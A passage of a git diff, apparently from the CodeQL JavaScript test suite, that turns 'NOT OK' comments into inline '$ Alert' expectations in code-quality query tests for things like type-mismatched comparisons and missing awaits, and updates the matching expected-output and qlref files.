Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:150:12:150:15 | null | an expression | +| tst.js:151:5:151:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:151:14:151:15 | t1 | variable 't1' | +| tst.js:154:5:154:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:154:12:154:15 | null | an expression | +| tst.js:155:5:155:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:155:14:155:15 | t2 | variable 't2' | +| tst.js:158:5:158:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. | tst.js:158:12:158:15 | null | an expression | +| tst.js:159:5:159:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:159:14:159:15 | t3 | variable 't3' | +| tst.js:162:5:162:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:162:12:162:15 | null | an expression | +| tst.js:163:5:163:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:163:14:163:15 | t4 | variable 't4' | +| tst.js:166:5:166:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. | tst.js:166:12:166:15 | null | an expression | +| tst.js:167:5:167:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:167:14:167:15 | t5 | variable 't5' | +| tst.js:170:5:170:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:170:12:170:15 | null | an expression | +| tst.js:171:5:171:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:171:14:171:15 | t6 | variable 't6' | +| tst.js:174:5:174:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:174:12:174:15 | null | an expression | +| tst.js:175:5:175:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:175:14:175:15 | t7 | variable 't7' | +| tst.js:178:5:178:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:178:12:178:15 | null | an expression | +| tst.js:179:5:179:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:179:14:179:15 | t8 | variable 't8' | +| tst.js:192:5:192:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:192:12:192:13 | t4 | variable 't4' | +| tst.js:193:5:193:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:193:12:193:13 | t2 | variable 't2' | +| tst.js:194:5:194:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:194:12:194:13 | t4 | variable 't4' | +| tst.js:195:5:195:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:195:12:195:13 | t3 | variable 't3' | +| tst.js:197:5:197:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:197:12:197:13 | t5 | variable 't5' | +| tst.js:198:5:198:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:198:12:198:13 | t2 | variable 't2' | +| tst.js:199:5:199:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:199:12:199:13 | t5 | variable 't5' | +| tst.js:200:5:200:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:200:12:200:13 | t3 | variable 't3' | +| tst.js:215:13:215:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:215:20:215:24 | "foo" | an expression | +| tst.js:223:5:223:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. | tst.js:223:11:223:12 | 42 | an expression | diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.qlref b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.qlref index 13b0e2a181cb..22ce4796bb35 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.qlref +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.qlref @@ -1 +1,2 @@ -Expressions/HeterogeneousComparison.ql \ No newline at end of file +query: Expressions/HeterogeneousComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/interprocedural.js b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/interprocedural.js index 82e536676198..0d2af62c7bf6 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/interprocedural.js +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/interprocedural.js @@ -8,13 +8,13 @@ // disable the whitelist known = known; unknown = unknown; gotKnown = gotKnown; gotUnknown = gotUnknown; - known === 42; + known === 42; // $ Alert known == 42; gotKnown === 42; gotKnown == 42; - getKnown() === 42; + getKnown() === 42; // $ Alert getKnown() == 42; - getKnown_indirect() === 42; + getKnown_indirect() === 42; // $ Alert getKnown_indirect() == 42; unknown === 42; diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js index f500d4cdafce..c441f4834658 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js @@ -1,137 +1,127 @@ -// NOT OK -if (typeof window !== undefined) +if (typeof window !== undefined) // $ Alert console.log("browser"); -// OK + if (typeof window === "undefined") console.log("not a browser"); -// NOT OK -if ("Hello, world".indexOf("Hello" >= 0)) +if ("Hello, world".indexOf("Hello" >= 0)) // $ Alert console.log("It's in there."); -// OK + true < 1; -// OK + undefined == null; -// NOT OK -null == 0; +null == 0; // $ Alert -// NOT OK switch ("hi") { -case 42: +case 42: // $ Alert } -// NOT OK -Object.toString() + "!" == undefined; +Object.toString() + "!" == undefined; // $ Alert -// NOT OK -(+f() || !g() || (h() + k())) == undefined; +(+f() || !g() || (h() + k())) == undefined; // $ Alert -// NOT OK -if (!Module['load'] == 'undefined') { +if (!Module['load'] == 'undefined') { // $ Alert } function f(x) { return true; - // OK + return x === 42; } function g() { var number = 0; // number - // OK + number == "0"; - // NO OK - number == "zero"; + + number == "zero"; // $ Alert } -// NOT OK -0 < (Math.random() > 0.5 ? void 0 : [1, 2]); +0 < (Math.random() > 0.5 ? void 0 : [1, 2]); // $ Alert + -// OK '100' < 1000; -// OK (fvsvo "OK") +// OK - fvsvo "OK" 100 > ''; -// OK + new Date('foo') == 'Invalid Date'; -// OK + new String('bar') == 'bar'; -// OK + ({ valueOf: () => true } == true); -// OK + ({ valueOf: () => 42 } == 42); -// OK + ({ valueOf: () => 'hi' } == 'hi'); -// OK + ({ valueOf: () => null } == null); -// NOT OK, but not currently flagged since we conservatively -// assume that `new Date(123)` could return any object, not necessarily a Date -new Date(123) == 123 +new Date(123) == 123; // $ MISSING: Alert - we conservatively assume that `new Date(123)` could return any object, not necessarily a Date function f(x1, x2, x3, x4, x5, x6){ - typeof x1 === 'object' && x1 !== null; // OK + typeof x1 === 'object' && x1 !== null; if (!x2) { x2 = new Error(); } - typeof x2 === 'object' && x2 !== null; // NOT OK: x2 cannot be null here + typeof x2 === 'object' && x2 !== null; // $ Alert - x2 cannot be null here if (x3) { - typeof x3 === 'object' && x3 !== null; // NOT OK: x3 cannot be null here + typeof x3 === 'object' && x3 !== null; // $ Alert - x3 cannot be null here } if (!x4) { - typeof x4 === 'object' && x4 !== null; // OK + typeof x4 === 'object' && x4 !== null; } if (!x5) { x5 = new Error(); } - x5 !== null; // NOT OK: x2 cannot be null here + x5 !== null; // $ Alert - x2 cannot be null here if (x6) { - x6 !== null; // NOT OK: x3 cannot be null here + x6 !== null; // $ Alert - x3 cannot be null here } } function g() { var o = {}; - o < "def"; // NOT OK + o < "def"; // $ Alert var p = { toString() { return "abc"; } }; - p < "def"; // OK + p < "def"; function A() {} var a = new A(); - a < "def"; // NOT OK + a < "def"; // $ Alert function B() {}; B.prototype = p; var b = new B(); - b < "def"; // OK + b < "def"; function C() { this.valueOf = function() { return 42; }; } var c = new C(); - c != 23; // OK + c != 23; null.valueOf = function() { return 42; }; - null == 42; // NOT OK + null == 42; // $ Alert true.valueOf = function() { return "foo" }; - true != "bar"; // NOT OK + true != "bar"; // $ Alert } @@ -139,54 +129,54 @@ function h() { var a = 42; var b = "42"; - a === "42"; // NOT OK - 42 === b // NOT OK - a === b; // NOT OK + a === "42"; // $ Alert + 42 === b // $ Alert + a === b; // $ Alert } function i() { - "foo" === undefined - undefined === "foo" // NOT OK + "foo" === undefined // $ Alert + undefined === "foo" // $ Alert var NaN = 0; // trick analysis to consider warning about NaN, for the purpose of testing pretty printing - NaN === "foo" // NOT OK + NaN === "foo" // $ Alert var Infinity = 0; // trick analysis to consider warning about Infinity, for the purpose of testing pretty printing - Infinity === "foo" // NOT OK + Infinity === "foo" // $ Alert } function k() { // tests for pretty printing of many types var t1 = 42; - t1 !== null; // NOT OK - null !== t1; // NOT OK + t1 !== null; // $ Alert + null !== t1; // $ Alert var t2 = unknown? t1: "foo"; - t2 !== null; // NOT OK - null !== t2; // NOT OK + t2 !== null; // $ Alert + null !== t2; // $ Alert var t3 = unknown? t2: undefined; - t3 !== null; // NOT OK - null !== t3; // NOT OK + t3 !== null; // $ Alert + null !== t3; // $ Alert var t4 = unknown? t3: true; - t4 !== null; // NOT OK - null !== t4; // NOT OK + t4 !== null; // $ Alert + null !== t4; // $ Alert var t5 = unknown? t4: function(){}; - t5 !== null; // NOT OK - null !== t5; // NOT OK + t5 !== null; // $ Alert + null !== t5; // $ Alert var t6 = unknown? t5: /t/; - t6 !== null; // NOT OK - null !== t6; // NOT OK + t6 !== null; // $ Alert + null !== t6; // $ Alert var t7 = unknown? t6: {}; - t7 !== null; // NOT OK - null !== t7; // NOT OK + t7 !== null; // $ Alert + null !== t7; // $ Alert var t8 = unknown? t8: new Symbol(); - t8 !== null; // NOT OK - null !== t8; // NOT OK + t8 !== null; // $ Alert + null !== t8; // $ Alert } @@ -199,22 +189,22 @@ function l() { var t4 = unknown? 42: unknown? "foo": unknown? undefined: true; var t5 = unknown? t4: null - t2 !== t4; // NOT OK - t4 !== t2; // NOT OK - t3 !== t4; // NOT OK - t4 !== t3; // NOT OK + t2 !== t4; // $ Alert + t4 !== t2; // $ Alert + t3 !== t4; // $ Alert + t4 !== t3; // $ Alert - t2 !== t5; // NOT OK - t5 !== t2; // NOT OK - t3 !== t5; // NOT OK - t5 !== t3; // NOT OK + t2 !== t5; // $ Alert + t5 !== t2; // $ Alert + t3 !== t5; // $ Alert + t5 !== t3; // $ Alert } -1n == 1; // OK +1n == 1; (function tooGeneralLocalFunctions(){ function f1(x) { - if (x === "foo") { // OK, whitelisted + if (x === "foo") { // OK - whitelisted } } @@ -222,7 +212,7 @@ function l() { function f2(x, y) { var xy = o.q? x: y; - if (xy === "foo") { // NOT OK (not whitelisted like above) + if (xy === "foo") { // $ Alert - not whitelisted like above } } @@ -230,5 +220,5 @@ function l() { })(); function f(...x) { - x === 42 + x === 42 // $ Alert }; diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected index 3168aa8b1a0b..51a9ebb1f0a3 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected @@ -1,17 +1,17 @@ -| tst.js:2:1:2:7 | !method | This expression will be implicitly converted from boolean to string. | -| tst.js:17:6:17:9 | null | This expression will be implicitly converted from null to object. | -| tst.js:20:6:20:13 | 'string' | This expression will be implicitly converted from string to object. | -| tst.js:26:13:26:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. | -| tst.js:29:18:29:26 | !callback | This expression will be implicitly converted from boolean to object. | -| tst.js:53:5:53:10 | void 0 | This expression will be implicitly converted from undefined to number. | -| tst.js:61:3:61:3 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:67:8:67:8 | y | This expression will be implicitly converted from undefined to number. | -| tst.js:73:5:73:5 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:79:19:79:22 | name | This expression will be implicitly converted from undefined to string. | -| tst.js:85:3:85:3 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:100:5:100:7 | f() | This expression will be implicitly converted from undefined to number. | -| tst.js:106:5:106:7 | g() | This expression will be implicitly converted from undefined to number. | -| tst.js:109:13:109:15 | g() | This expression will be implicitly converted from undefined to number. | -| tst.js:110:13:110:15 | g() | This expression will be implicitly converted from undefined to string. | -| tst.js:117:8:117:8 | y | This expression will be implicitly converted from string to number. | -| tst.js:122:10:122:10 | y | This expression will be implicitly converted from string to number. | +| tst.js:1:1:1:7 | !method | This expression will be implicitly converted from boolean to string. | +| tst.js:15:6:15:9 | null | This expression will be implicitly converted from null to object. | +| tst.js:17:6:17:13 | 'string' | This expression will be implicitly converted from string to object. | +| tst.js:22:13:22:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. | +| tst.js:24:18:24:26 | !callback | This expression will be implicitly converted from boolean to object. | +| tst.js:47:5:47:10 | void 0 | This expression will be implicitly converted from undefined to number. | +| tst.js:54:3:54:3 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:59:8:59:8 | y | This expression will be implicitly converted from undefined to number. | +| tst.js:64:5:64:5 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:69:19:69:22 | name | This expression will be implicitly converted from undefined to string. | +| tst.js:74:3:74:3 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:89:5:89:7 | f() | This expression will be implicitly converted from undefined to number. | +| tst.js:95:5:95:7 | g() | This expression will be implicitly converted from undefined to number. | +| tst.js:98:13:98:15 | g() | This expression will be implicitly converted from undefined to number. | +| tst.js:99:13:99:15 | g() | This expression will be implicitly converted from undefined to string. | +| tst.js:106:8:106:8 | y | This expression will be implicitly converted from string to number. | +| tst.js:111:10:111:10 | y | This expression will be implicitly converted from string to number. | diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.qlref b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.qlref index 748469112b00..259f3333169e 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.qlref +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.qlref @@ -1 +1,2 @@ -Expressions/ImplicitOperandConversion.ql \ No newline at end of file +query: Expressions/ImplicitOperandConversion.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js index 811ef9c576c9..a72dc333dac5 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js @@ -1,41 +1,36 @@ -// NOT OK -!method in obj; +!method in obj; // $ Alert + -// OK !(method in obj); -// OK + '__proto__' in obj; -// OK + 0 in obj; -// OK + ('$' + key) in obj; -// NOT OK -p in null; +p in null; // $ Alert + +0 in 'string'; // $ Alert -// NOT OK -0 in 'string'; -// OK p in {}; -// NOT OK -console.log("Setting device's bluetooth name to '%s'" % device_name); +console.log("Setting device's bluetooth name to '%s'" % device_name); // $ Alert -// NOT OK -if (!callback || !callback instanceof Function) { +if (!callback || !callback instanceof Function) { // $ Alert ; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// OK + function cmp(x, y) { if (x > y) return 1; @@ -44,48 +39,42 @@ function cmp(x, y) { return 0; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// NOT OK -1 + void 0 +1 + void 0 // $ Alert + -// OK o[true] = 42; function f() { var x; - // NOT OK - x -= 2; + x -= 2; // $ Alert } function g() { var x = 19, y; - // NOT OK - x %= y; + x %= y; // $ Alert } function h() { var x; - // NOT OK - ++x; + ++x; // $ Alert } function k() { var name; - // NOT OK - return `Hello ${name}!`; + return `Hello ${name}!`; // $ Alert } function l() { var x; - // NOT OK - x ** 2; + x ** 2; // $ Alert } -1n + 1; // NOT OK, but not currently flagged +1n + 1; // $ MISSING: Alert (function(){ let sum = 0; @@ -97,27 +86,27 @@ function l() { (function(){ function f() { } - f()|0; + f()|0; // $ Alert unknown()|0; function g() { } - g()|0; + g()|0; // $ Alert g(); - var a = g() + 2; - var b = g() + "str"; + var a = g() + 2; // $ Alert + var b = g() + "str"; // $ Alert }); function m() { var x = 19, y = "string"; - x %= y; // NOT OK - x += y; // OK - x ||= y; // OK - x &&= y; // OK - x ??= y; // OK - x >>>= y; // NOT OK + x %= y; // $ Alert + x += y; + x ||= y; + x &&= y; + x ??= y; + x >>>= y; // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/MissingAwait.qlref b/javascript/ql/test/query-tests/Expressions/MissingAwait/MissingAwait.qlref index 05596cf67218..42bdeec727c7 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/MissingAwait.qlref +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/MissingAwait.qlref @@ -1 +1,2 @@ -Expressions/MissingAwait.ql \ No newline at end of file +query: Expressions/MissingAwait.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts index 4362c11a8e67..5f1774f1ab56 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts @@ -1,5 +1,5 @@ declare let cache: { [x: string]: Promise }; function deleteCache(x: string) { - delete cache[x]; // OK + delete cache[x]; } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js index 10fc244dbc44..61f599a6c33d 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js @@ -5,24 +5,24 @@ async function getThing() { function useThing() { let thing = getThing(); - if (thing === undefined) {} // NOT OK + if (thing === undefined) {} // $ Alert - if (thing == null) {} // NOT OK + if (thing == null) {} // $ Alert - something(thing ? 1 : 2); // NOT OK + something(thing ? 1 : 2); // $ Alert - for (let x in thing) { // NOT OK + for (let x in thing) { // $ Alert something(x); } let obj = something(); - something(obj[thing]); // NOT OK - obj[thing] = 5; // NOT OK + something(obj[thing]); // $ Alert + obj[thing] = 5; // $ Alert - something(thing + "bar"); // NOT OK + something(thing + "bar"); // $ Alert if (something()) { - if (thing) { // NOT OK + if (thing) { // $ Alert something(3); } } @@ -31,21 +31,21 @@ function useThing() { async function useThingCorrectly() { let thing = await getThing(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // OK + return thing + "bar"; } async function useThingCorrectly2() { let thing = getThing(); - if (await thing === undefined) {} // OK + if (await thing === undefined) {} - if (await thing == null) {} // OK + if (await thing == null) {} - return thing + "bar"; // NOT OK + return thing + "bar"; // $ Alert } function getThingSync() { @@ -55,21 +55,21 @@ function getThingSync() { function useThingPossiblySync(b) { let thing = b ? getThing() : getThingSync(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // NOT OK - but we don't flag it + return thing + "bar"; // $ MISSING: Alert } function useThingInVoid() { - void getThing(); // OK + void getThing(); } function useThing() { if (random()) { - return getThing() ?? null; // NOT OK + return getThing() ?? null; // $ Alert } else { - return getThing?.() ?? null; // OK + return getThing?.() ?? null; } -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js index cbfe6d3250e5..d12e82cb8c24 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js +++ b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js @@ -1,6 +1,6 @@ function total(bad) { var sum = 0 - for (var i = 0; i < bad; ++i) { // NOT OK + for (var i = 0; i < bad; ++i) { // $ Alert sum += bad[i] } return sum @@ -8,7 +8,7 @@ function total(bad) { function total_good(good) { var sum = 0 - for (var i = 0; i < good.length; ++i) { // OK + for (var i = 0; i < good.length; ++i) { sum += good[i] } return sum @@ -17,21 +17,21 @@ function total_good(good) { var fruits = ["banana", "pineapple"] function mix() { var drink = [] - for (var i = 0; i < fruits; ++i) { // NOT OK + for (var i = 0; i < fruits; ++i) { // $ Alert drink.push(fruits[i]) } } function mix_good() { var drink = [] - for (var i = 0; i < fruits.length; ++i) { // OK + for (var i = 0; i < fruits.length; ++i) { drink.push(fruits[i]) } } function overloaded(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } else if (mode == "blar") { return foo[bar]; } else { @@ -41,7 +41,7 @@ function overloaded(mode, foo, bar) { function overloaded_no_else(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } if (mode == "blar") { return foo[bar]; @@ -50,7 +50,7 @@ function overloaded_no_else(mode, foo, bar) { function reassigned(index, object) { var tmp = object.getMaximum() - if (index < tmp) { // OK + if (index < tmp) { tmp = object.getArray() return tmp[index] } diff --git a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.qlref b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.qlref index 2f3f0ef91259..022ddb3021ce 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.qlref +++ b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.qlref @@ -1 +1,2 @@ -Expressions/MissingDotLengthInComparison.ql +query: Expressions/MissingDotLengthInComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/MissingSpaceInAppend.qlref b/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/MissingSpaceInAppend.qlref index a9b914e23115..94b18824cca5 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/MissingSpaceInAppend.qlref +++ b/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/MissingSpaceInAppend.qlref @@ -1 +1,2 @@ -Expressions/MissingSpaceInAppend.ql +query: Expressions/MissingSpaceInAppend.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/missing.js b/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/missing.js index bdb85cc5bb11..36a28584382e 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/missing.js +++ b/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/missing.js @@ -1,32 +1,32 @@ var s; -s = "this text" + +s = "this text" + // $ Alert "is missing a space"; -s = "the class java.util.ArrayList" + +s = "the class java.util.ArrayList" + // $ Alert "without a space"; -s = "This isn't" + +s = "This isn't" + // $ Alert "right."; -s = "There's 1" + +s = "There's 1" + // $ Alert "thing wrong"; -s = "There's A/B" + +s = "There's A/B" + // $ Alert "and no space"; -s = "Wait for it...." + +s = "Wait for it...." + // $ Alert "No space!"; -s = "Is there a space?" + +s = "Is there a space?" + // $ Alert "No!"; -("missing " + "a space") + "here"; +("missing " + "a space") + "here"; // $ Alert // syntactic variants: -s = "missing a space" + +s = "missing a space" + // $ Alert "here"; -s = 'missing a space' + +s = 'missing a space' + // $ Alert 'here'; -s = `missing a space` + +s = `missing a space` + // $ Alert "here"; -s = "missing a space" + +s = "missing a space" + // $ Alert `here`; -s = `missing a space` + +s = `missing a space` + // $ Alert `here`; -s = (("missing space") + "here") +s = (("missing space") + "here") // $ Alert -s = (("h. 0" + "h")) + "word" +s = (("h. 0" + "h")) + "word" // $ Alert diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected index 1bf8599b8be5..05bc8f28ad14 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected @@ -1,6 +1,6 @@ -| tst.js:5:19:5:24 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:26:5:26:10 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:26:16:26:21 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:32:27:32:34 | avalable | 'avalable' may be a typo for 'available'. | -| tst.js:42:5:42:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. | -| tst.js:43:5:43:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. | +| tst.js:4:19:4:24 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:24:5:24:10 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:24:16:24:21 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:29:27:29:34 | avalable | 'avalable' may be a typo for 'available'. | +| tst.js:39:5:39:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. | +| tst.js:40:5:40:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. | diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.qlref b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.qlref index fc411787f5bf..4f10b063bb99 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.qlref +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.qlref @@ -1 +1,2 @@ -Expressions/MisspelledIdentifier.ql \ No newline at end of file +query: Expressions/MisspelledIdentifier.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js index 101c6b360b48..5016873b6a59 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js @@ -1,43 +1,40 @@ // use of .length to prime the query a.length; -// NOT OK -for (var i=0; i - errorMessage; + errorMessage; // $ Alert } function foo() { var thisHander; - thisHandler.foo1; - thisHandler.foo2; - thisHandler.foo3; - thisHandler.foo4; - thisHandler.foo5; - thisHandler.foo6; - thisHandler.foo7; - thisHandler.foo8; + thisHandler.foo1; // $ Alert + thisHandler.foo2; // $ Alert + thisHandler.foo3; // $ Alert + thisHandler.foo4; // $ Alert + thisHandler.foo5; // $ Alert + thisHandler.foo6; // $ Alert + thisHandler.foo7; // $ Alert + thisHandler.foo8; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/RedundantExpression/RedundantExpression.qlref b/javascript/ql/test/query-tests/Expressions/RedundantExpression/RedundantExpression.qlref index f7b19a84df53..f8401e03f0d5 100644 --- a/javascript/ql/test/query-tests/Expressions/RedundantExpression/RedundantExpression.qlref +++ b/javascript/ql/test/query-tests/Expressions/RedundantExpression/RedundantExpression.qlref @@ -1 +1,2 @@ -Expressions/RedundantExpression.ql \ No newline at end of file +query: Expressions/RedundantExpression.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/RedundantExpression/tst.js b/javascript/ql/test/query-tests/Expressions/RedundantExpression/tst.js index b556d518eca4..25db749dde38 100644 --- a/javascript/ql/test/query-tests/Expressions/RedundantExpression/tst.js +++ b/javascript/ql/test/query-tests/Expressions/RedundantExpression/tst.js @@ -1,11 +1,11 @@ -(x + x) / 2; -e[i] - e[i]; -(x + y)/(x + y); -window.height - window.height; -x == 23 || x == 23; +(x + x) / 2; // $ Alert +e[i] - e[i]; // $ Alert +(x + y)/(x + y); // $ Alert +window.height - window.height; // $ Alert +x == 23 || x == 23; // $ Alert x & x; // this may actually be OK, but it's not good style -pop() && pop(); +pop() && pop(); // $ Alert -foo[bar++] && foo[bar++] // OK \ No newline at end of file +foo[bar++] && foo[bar++] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected index e97b3e8fe783..fcdf350a9268 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected @@ -1,5 +1,5 @@ | jsdoc.js:9:5:9:19 | this.y = this.y | This expression assigns property y to itself. | | jsdoc.js:11:5:11:23 | this.arg = this.arg | This expression assigns property arg to itself. | -| tst.js:5:2:5:14 | width = width | This expression assigns variable width to itself. | -| tst.js:24:1:24:19 | array[1] = array[1] | This expression assigns element 1 to itself. | -| tst.js:27:1:27:9 | o.x = o.x | This expression assigns property x to itself. | +| tst.js:4:2:4:14 | width = 